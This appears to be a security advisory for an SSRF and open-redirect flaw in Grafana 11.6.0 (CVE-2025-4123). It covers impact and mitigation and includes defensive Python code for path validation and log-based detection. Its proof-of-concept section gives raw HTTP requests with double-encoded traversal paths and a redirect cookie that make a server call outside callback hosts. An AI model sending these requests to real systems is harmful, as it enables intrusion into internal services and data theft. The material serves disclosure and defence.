Grafana 11.6.0 – SSRF

Categories: WebApps

Overview

The recently disclosed SSRF vulnerability in Grafana 11.6.0, tracked as CVE-2025-4123, poses a significant risk to users of this widely deployed open-source analytics and monitoring platform. The flaw lets an attacker make a Grafana server issue crafted requests toward internal systems, potentially exposing sensitive data or enabling unauthorized actions inside the network.

Technical Details

At its core, CVE-2025-4123 is a Server-Side Request Forgery (SSRF) flaw in Grafana. By crafting specific requests, an attacker can make a Grafana instance issue HTTP requests to internal resources. This is particularly dangerous because it can reach services that are not exposed to the public internet, such as cloud metadata APIs or internal databases.

The vulnerability stems from insufficient validation of user-supplied input, which lets attackers bypass the intended controls. For example, an attacker could cause a request to http://localhost:3000/secret-data, potentially retrieving sensitive information held in a backend database or configuration files.
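The root cause named above is missing input validation on a path that reaches a public-asset handler. The following is an added example written for this page, not Grafana's code and not the exploit author's: a hypothetical `validate_public_path` function that decodes a request path exactly once, refuses anything that still looks encoded, and rejects backslashes, dot segments, empty segments and query characters before the path is used. The allowed prefixes `/public/` and `/render/public/` are assumed for illustration. It is run here against the two PoC paths shown later on this page and against a benign asset path.

```python
"""Added illustration (not Grafana's code): strict validation of a path
handed to a public-asset handler, the class of check whose absence is
described in this advisory."""
from __future__ import annotations

import re
from urllib.parse import unquote

# Assumed for illustration: the prefixes the handler is meant to serve.
ALLOWED_PREFIXES = ("/public/", "/render/public/")

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def validate_public_path(raw_path: str) -> tuple[bool, str]:
    """Return (accepted, reason) for a raw request path.

    The path is percent-decoded exactly once. Any '%' left afterwards means
    the input was double-encoded, so a later decoding round could turn it
    into something this check never saw; such input is rejected outright.
    """
    if not raw_path.startswith(ALLOWED_PREFIXES):
        return False, "outside allowed prefixes"

    decoded = unquote(raw_path)

    if "%" in decoded:
        return False, "residual percent-encoding after one decode (double encoding)"
    if "\\" in decoded:
        # WHATWG URL parsing treats '\' like '/' in http(s) URLs, so a
        # backslash can change how a client re-resolves the path.
        return False, "backslash in path (browsers treat it as a slash)"
    if any(c in decoded for c in "?#"):
        return False, "query or fragment characters in path"
    if CONTROL_CHARS.search(decoded):
        return False, "control character in path"
    if "//" in decoded:
        # An empty segment can collapse into a protocol-relative URL.
        return False, "empty path segment (protocol-relative URL risk)"

    segments = decoded.split("/")
    if any(seg in ("..", ".") for seg in segments):
        return False, "dot segment in path"
    if not decoded.startswith(ALLOWED_PREFIXES):
        return False, "decoded path escaped allowed prefix"
    return True, "ok"


if __name__ == "__main__":
    # The first two paths are the ones from this page's PoC; the third is benign.
    for p in (
        "/render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f..",
        "/public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F..",
        "/public/img/grafana_icon.svg",
    ):
        accepted, reason = validate_public_path(p)
        print(f"{'ACCEPT' if accepted else 'REJECT'} {p!r}: {reason}")
```

The order of the checks matters: the double-encoding test runs first because it is the one that makes the other checks trustworthy; once a single decode is known to be final, the backslash, dot-segment and prefix checks all apply to the same string the handler will actually use.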

Impact

The implications of CVE-2025-4123 are severe: successful exploitation can lead to data leakage, unauthorized access to internal services, and in the worst case full system compromise. Organizations that rely on Grafana for monitoring and analytics may find sensitive data exposed, with regulatory penalties and reputational damage as a consequence.

Mitigation

To protect against CVE-2025-4123, organizations should upgrade to a Grafana release in which this vulnerability has been patched. Security teams should prioritize rolling this update out to every instance in use.

Additionally, network segmentation and strict access controls limit what an SSRF flaw can reach even before a patch is applied. Regular security audits and penetration testing should be conducted to find and remediate weaknesses in the infrastructure. Finally, training development teams in secure coding practices reduces the risk of similar vulnerabilities appearing in the future.

Proof of Concept (PoC)

request.http
# Exploit Title: Grafana 11.6.0 - SSRF
# FOFA: app="Grafana"
# Date: 2-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 11.2.0 - 11.6.0
# CVE: CVE-2025-4123

Description:
An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure.

POC:
GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip

GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
Connection: close
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
Accept-Encoding: gzip
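The two requests above give a defender concrete indicators to look for. What follows is an added detection example written for this page, not Grafana's or the exploit author's code: it parses Grafana-style logfmt request-log lines (the `msg="Request Completed"` records with `path=` and `remote_addr=` fields; the exact field set is assumed, and the sample lines are constructed, not real traffic), fully decodes each path under `/public/` or `/render/public/`, and reports double encoding, backslash separators, `..` traversal and query characters in the path. The function names `parse_logfmt`, `inspect_path` and `scan_log` are hypothetical.

```python
"""Added example (not Grafana's or the exploit author's code): flag request
paths matching the encoded-traversal pattern behind CVE-2025-4123 in
Grafana-style request logs."""
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed sample lines in a Grafana-like logfmt layout; not real traffic.
# The two suspicious paths are the ones shown in the PoC above.
SAMPLE_LOG = """\
logger=context userId=0 orgId=1 uname= t=2025-11-02T10:15:01Z level=info msg="Request Completed" method=GET path=/public/img/grafana_icon.svg status=200 remote_addr=10.0.0.5
logger=context userId=0 orgId=1 uname= t=2025-11-02T10:15:07Z level=info msg="Request Completed" method=GET path=/render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. status=200 remote_addr=203.0.113.9
logger=context userId=0 orgId=1 uname= t=2025-11-02T10:15:09Z level=info msg="Request Completed" method=GET path=/public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. status=200 remote_addr=203.0.113.9
logger=context userId=1 orgId=1 uname=admin t=2025-11-02T10:16:00Z level=info msg="Request Completed" method=GET path=/api/dashboards/home status=200 remote_addr=10.0.0.5
"""

# key=value pairs; values are either a double-quoted string or a bare token.
LOGFMT_TOKEN = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S*)')

WATCHED_PREFIXES = ("/public/", "/render/public/")


def parse_logfmt(line: str) -> dict[str, str]:
    """Parse one logfmt line into a dict, unquoting quoted values."""
    fields: dict[str, str] = {}
    for key, val in LOGFMT_TOKEN.findall(line):
        if len(val) >= 2 and val.startswith('"') and val.endswith('"'):
            val = val[1:-1].replace('\\"', '"')
        fields[key] = val
    return fields


def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded input is seen
    the way a lenient decoder would eventually see it."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s


def inspect_path(raw_path: str) -> list[str]:
    """Return the indicator names present in one request path (empty if clean)."""
    indicators: list[str] = []
    if not raw_path.startswith(WATCHED_PREFIXES):
        return indicators
    decoded = fully_decode(raw_path)
    if "%25" in raw_path.lower():
        indicators.append("double-encoding")
    if "\\" in decoded:
        indicators.append("backslash-separator")
    if any(seg == ".." for seg in decoded.replace("\\", "/").split("/")):
        indicators.append("dot-dot-traversal")
    if "?" in decoded:
        indicators.append("query-in-path")
    return indicators


def scan_log(text: str) -> list[dict]:
    """Scan logfmt lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_logfmt(line)
        path = rec.get("path", "")
        hits = inspect_path(path)
        if hits:
            findings.append({
                "time": rec.get("t"),
                "remote_addr": rec.get("remote_addr"),
                "path": path,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["remote_addr"], ", ".join(f["indicators"]), f["path"])
```

Unlike the validator a server should apply, a detector decodes as far as it can: the goal here is to see what a lenient consumer would eventually see, and a false positive on a log line is cheap. Asset paths such as `/public/img/grafana_icon.svg` produce no indicators, so the rule can run over the full request log rather than a pre-filtered subset.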

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.
